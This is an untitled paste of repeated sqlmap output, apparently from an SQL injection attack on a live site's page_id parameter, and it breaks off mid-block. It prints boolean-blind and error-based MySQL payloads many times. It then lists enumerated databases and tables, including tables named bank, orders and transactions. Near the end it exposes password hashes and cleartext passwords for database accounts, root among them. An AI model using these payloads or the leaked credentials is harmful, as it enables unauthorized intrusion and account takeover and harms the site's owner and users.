Untitled

 #     #
 ##   ## #    # #      ##### # #####  #      ###### #    #  ####  #####
 # # # # #    # #        #   # #    # #      #       #  #  #    # #    #
 #  #  # #    # #        #   # #    # #      #####    ##   #    # #    #
 #     # #    # #        #   # #####  #      #        ##   #    # #####
 #     # #    # #        #   # #      #      #       #  #  #    # #   #
 #     #  ####  ######   #   # #      ###### ###### #    #  ####  #    #


sqlmap IDENTIFIED the following injection points WITH a total OF 28 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

available DATABASES [9]:
[*] information_schema
[*] mysql
[*] orcataco_bumperstic
[*] orcataco_officerjones
[*] orcataco_officerjones_1
[*] orcataco_officerjones_2
[*] orcataco_snap
[*] signedbump
[*] test

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

DATABASE: mysql
[17 TABLES]
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| USER                      |
+---------------------------+

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

available DATABASES [9]:
[*] information_schema
[*] mysql
[*] orcataco_bumperstic
[*] orcataco_officerjones
[*] orcataco_officerjones_1
[*] orcataco_officerjones_2
[*] orcataco_snap
[*] signedbump
[*] test

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

DATABASE: orcataco_bumperstic
[113 TABLES]
+--------------------------+
| _settings                |
| bank                     |
| basket_items             |
| basket_orders            |
| basket_tags              |
| baskets                  |
| brands                   |
| bsuids                   |
| categories               |
| clickemail               |
| clickwizard              |
| comment                  |
| counters                 |
| counters_i12             |
| counters_i24             |
| counters_o12             |
| counters_o24             |
| emailsendlog             |
| favorite_orders          |
| feedback                 |
| game                     |
| game_score               |
| hm_events                |
| hm_message_queue         |
| invited                  |
| invited_from_force       |
| item_book                |
| item_tags                |
| items                    |
| line_items               |
| logadd                   |
| logcontacts              |
| loggiftclick             |
| logimport                |
| loginvite                |
| loginvited               |
| logvalidate              |
| logwizard                |
| motd                     |
| notified                 |
| notify_off               |
| occasions                |
| orders                   |
| orders_non_facebook      |
| page_items               |
| played                   |
| post_install_items       |
| post_install_items_v2    |
| profile_settings         |
| public_pages             |
| publish_stream_sgnonpred |
| purchase                 |
| quicksender              |
| recent_users             |
| reply_from_hist          |
| requests_sent            |
| rpd_by_day               |
| sendqueue                |
| sendsthisweek            |
| sendsthisweek2           |
| sent                     |
| settings                 |
| stream_posts             |
| survey_answers           |
| survey_questions         |
| tag_stats                |
| tags                     |
| temp_birthday_orders     |
| temp_click_events        |
| temp_daily_stats         |
| temp_despicable_me       |
| temp_funnel_test_orders  |
| temp_hourly_stats        |
| temp_invite_stats        |
| temp_invite_stats_v2     |
| temp_item_recs2          |
| temp_nectar_ads          |
| temp_nectar_stats_v2     |
| temp_order_clicks        |
| temp_page_counter        |
| temp_page_visits         |
| temp_premium_orders      |
| temp_request_demo_stats  |
| temp_request_stats       |
| temp_retention_daily     |
| temp_retention_weekly    |
| temp_sendgroup_members   |
| temp_sendgroup_sends     |
| temp_test_order_users    |
| temp_test_orders         |
| temp_tutorial_stages     |
| temp_user_credits        |
| temp_userbase            |
| theme_tag_map            |
| theme_tags               |
| themes                   |
| themes_user_gen          |
| transactions             |
| uids                     |
| unlocked                 |
| unopened                 |
| unsent                   |
| unsubscribe              |
| user_country             |
| user_groups              |
| user_items               |
| user_pages               |
| user_pageviews           |
| user_pageviews_v2        |
| user_themes              |
| userbase                 |
| winner                   |
| wishlist                 |
+--------------------------+

DATABASE: test
[21 TABLES]
+------------------------+
| TempTable              |
| appinfo                |
| autoincr               |
| cur                    |
| deals                  |
| errorcounts            |
| errorfromfirst1000     |
| install_metrics        |
| installs_by_day        |
| installs_by_invite_day |
| invited_from_force     |
| invites_by_day         |
| invites_by_newuser_day |
| ret_users2             |
| retlog                 |
| rpdbyda                |
| send_log               |
| uids                   |
| user_country           |
| x                      |
| y                      |
+------------------------+

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

DATABASE: test
[21 TABLES]
+------------------------+
| TempTable              |
| appinfo                |
| autoincr               |
| cur                    |
| deals                  |
| errorcounts            |
| errorfromfirst1000     |
| install_metrics        |
| installs_by_day        |
| installs_by_invite_day |
| invited_from_force     |
| invites_by_day         |
| invites_by_newuser_day |
| ret_users2             |
| retlog                 |
| rpdbyda                |
| send_log               |
| uids                   |
| user_country           |
| x                      |
| y                      |
+------------------------+

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

DATABASE: orcataco_bumperstic
[113 TABLES]
+--------------------------+
| _settings                |
| bank                     |
| basket_items             |
| basket_orders            |
| basket_tags              |
| baskets                  |
| brands                   |
| bsuids                   |
| categories               |
| clickemail               |
| clickwizard              |
| comment                  |
| counters                 |
| counters_i12             |
| counters_i24             |
| counters_o12             |
| counters_o24             |
| emailsendlog             |
| favorite_orders          |
| feedback                 |
| game                     |
| game_score               |
| hm_events                |
| hm_message_queue         |
| invited                  |
| invited_from_force       |
| item_book                |
| item_tags                |
| items                    |
| line_items               |
| logadd                   |
| logcontacts              |
| loggiftclick             |
| logimport                |
| loginvite                |
| loginvited               |
| logvalidate              |
| logwizard                |
| motd                     |
| notified                 |
| notify_off               |
| occasions                |
| orders                   |
| orders_non_facebook      |
| page_items               |
| played                   |
| post_install_items       |
| post_install_items_v2    |
| profile_settings         |
| public_pages             |
| publish_stream_sgnonpred |
| purchase                 |
| quicksender              |
| recent_users             |
| reply_from_hist          |
| requests_sent            |
| rpd_by_day               |
| sendqueue                |
| sendsthisweek            |
| sendsthisweek2           |
| sent                     |
| settings                 |
| stream_posts             |
| survey_answers           |
| survey_questions         |
| tag_stats                |
| tags                     |
| temp_birthday_orders     |
| temp_click_events        |
| temp_daily_stats         |
| temp_despicable_me       |
| temp_funnel_test_orders  |
| temp_hourly_stats        |
| temp_invite_stats        |
| temp_invite_stats_v2     |
| temp_item_recs2          |
| temp_nectar_ads          |
| temp_nectar_stats_v2     |
| temp_order_clicks        |
| temp_page_counter        |
| temp_page_visits         |
| temp_premium_orders      |
| temp_request_demo_stats  |
| temp_request_stats       |
| temp_retention_daily     |
| temp_retention_weekly    |
| temp_sendgroup_members   |
| temp_sendgroup_sends     |
| temp_test_order_users    |
| temp_test_orders         |
| temp_tutorial_stages     |
| temp_user_credits        |
| temp_userbase            |
| theme_tag_map            |
| theme_tags               |
| themes                   |
| themes_user_gen          |
| transactions             |
| uids                     |
| unlocked                 |
| unopened                 |
| unsent                   |
| unsubscribe              |
| user_country             |
| user_groups              |
| user_items               |
| user_pages               |
| user_pageviews           |
| user_pageviews_v2        |
| user_themes              |
| userbase                 |
| winner                   |
| wishlist                 |
+--------------------------+

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

DATABASE: orcataco_bumperstic
[113 TABLES]
+--------------------------+
| _settings                |
| bank                     |
| basket_items             |
| basket_orders            |
| basket_tags              |
| baskets                  |
| brands                   |
| bsuids                   |
| categories               |
| clickemail               |
| clickwizard              |
| comment                  |
| counters                 |
| counters_i12             |
| counters_i24             |
| counters_o12             |
| counters_o24             |
| emailsendlog             |
| favorite_orders          |
| feedback                 |
| game                     |
| game_score               |
| hm_events                |
| hm_message_queue         |
| invited                  |
| invited_from_force       |
| item_book                |
| item_tags                |
| items                    |
| line_items               |
| logadd                   |
| logcontacts              |
| loggiftclick             |
| logimport                |
| loginvite                |
| loginvited               |
| logvalidate              |
| logwizard                |
| motd                     |
| notified                 |
| notify_off               |
| occasions                |
| orders                   |
| orders_non_facebook      |
| page_items               |
| played                   |
| post_install_items       |
| post_install_items_v2    |
| profile_settings         |
| public_pages             |
| publish_stream_sgnonpred |
| purchase                 |
| quicksender              |
| recent_users             |
| reply_from_hist          |
| requests_sent            |
| rpd_by_day               |
| sendqueue                |
| sendsthisweek            |
| sendsthisweek2           |
| sent                     |
| settings                 |
| stream_posts             |
| survey_answers           |
| survey_questions         |
| tag_stats                |
| tags                     |
| temp_birthday_orders     |
| temp_click_events        |
| temp_daily_stats         |
| temp_despicable_me       |
| temp_funnel_test_orders  |
| temp_hourly_stats        |
| temp_invite_stats        |
| temp_invite_stats_v2     |
| temp_item_recs2          |
| temp_nectar_ads          |
| temp_nectar_stats_v2     |
| temp_order_clicks        |
| temp_page_counter        |
| temp_page_visits         |
| temp_premium_orders      |
| temp_request_demo_stats  |
| temp_request_stats       |
| temp_retention_daily     |
| temp_retention_weekly    |
| temp_sendgroup_members   |
| temp_sendgroup_sends     |
| temp_test_order_users    |
| temp_test_orders         |
| temp_tutorial_stages     |
| temp_user_credits        |
| temp_userbase            |
| theme_tag_map            |
| theme_tags               |
| themes                   |
| themes_user_gen          |
| transactions             |
| uids                     |
| unlocked                 |
| unopened                 |
| unsent                   |
| unsubscribe              |
| user_country             |
| user_groups              |
| user_items               |
| user_pages               |
| user_pageviews           |
| user_pageviews_v2        |
| user_themes              |
| userbase                 |
| winner                   |
| wishlist                 |
+--------------------------+

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

DATABASE: orcataco_bumperstic
[113 TABLES]
+--------------------------+
| _settings                |
| bank                     |
| basket_items             |
| basket_orders            |
| basket_tags              |
| baskets                  |
| brands                   |
| bsuids                   |
| categories               |
| clickemail               |
| clickwizard              |
| comment                  |
| counters                 |
| counters_i12             |
| counters_i24             |
| counters_o12             |
| counters_o24             |
| emailsendlog             |
| favorite_orders          |
| feedback                 |
| game                     |
| game_score               |
| hm_events                |
| hm_message_queue         |
| invited                  |
| invited_from_force       |
| item_book                |
| item_tags                |
| items                    |
| line_items               |
| logadd                   |
| logcontacts              |
| loggiftclick             |
| logimport                |
| loginvite                |
| loginvited               |
| logvalidate              |
| logwizard                |
| motd                     |
| notified                 |
| notify_off               |
| occasions                |
| orders                   |
| orders_non_facebook      |
| page_items               |
| played                   |
| post_install_items       |
| post_install_items_v2    |
| profile_settings         |
| public_pages             |
| publish_stream_sgnonpred |
| purchase                 |
| quicksender              |
| recent_users             |
| reply_from_hist          |
| requests_sent            |
| rpd_by_day               |
| sendqueue                |
| sendsthisweek            |
| sendsthisweek2           |
| sent                     |
| settings                 |
| stream_posts             |
| survey_answers           |
| survey_questions         |
| tag_stats                |
| tags                     |
| temp_birthday_orders     |
| temp_click_events        |
| temp_daily_stats         |
| temp_despicable_me       |
| temp_funnel_test_orders  |
| temp_hourly_stats        |
| temp_invite_stats        |
| temp_invite_stats_v2     |
| temp_item_recs2          |
| temp_nectar_ads          |
| temp_nectar_stats_v2     |
| temp_order_clicks        |
| temp_page_counter        |
| temp_page_visits         |
| temp_premium_orders      |
| temp_request_demo_stats  |
| temp_request_stats       |
| temp_retention_daily     |
| temp_retention_weekly    |
| temp_sendgroup_members   |
| temp_sendgroup_sends     |
| temp_test_order_users    |
| temp_test_orders         |
| temp_tutorial_stages     |
| temp_user_credits        |
| temp_userbase            |
| theme_tag_map            |
| theme_tags               |
| themes                   |
| themes_user_gen          |
| transactions             |
| uids                     |
| unlocked                 |
| unopened                 |
| unsent                   |
| unsubscribe              |
| user_country             |
| user_groups              |
| user_items               |
| user_pages               |
| user_pageviews           |
| user_pageviews_v2        |
| user_themes              |
| userbase                 |
| winner                   |
| wishlist                 |
+--------------------------+

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

help [1]:

wget txt [1]:

? [1]:

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

DATABASE management system users password hashes:
[*] karen [2]:
    password hash: 1c00fc2b05570f2f
    password hash: 248036c235f60aa8
[*] nujeplies [1]:
    password hash: NULL
[*] root [5]:
    password hash: 248036c235f60aa8
    password hash: 248036c235f60aa8
    password hash: 4fc67fc309a271b8
    clear-text password: karen
    clear-text password: karen
    password hash: 4fc67fc309a271b8
    clear-text password: karen
    clear-text password: karen
    password hash: NULL
sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
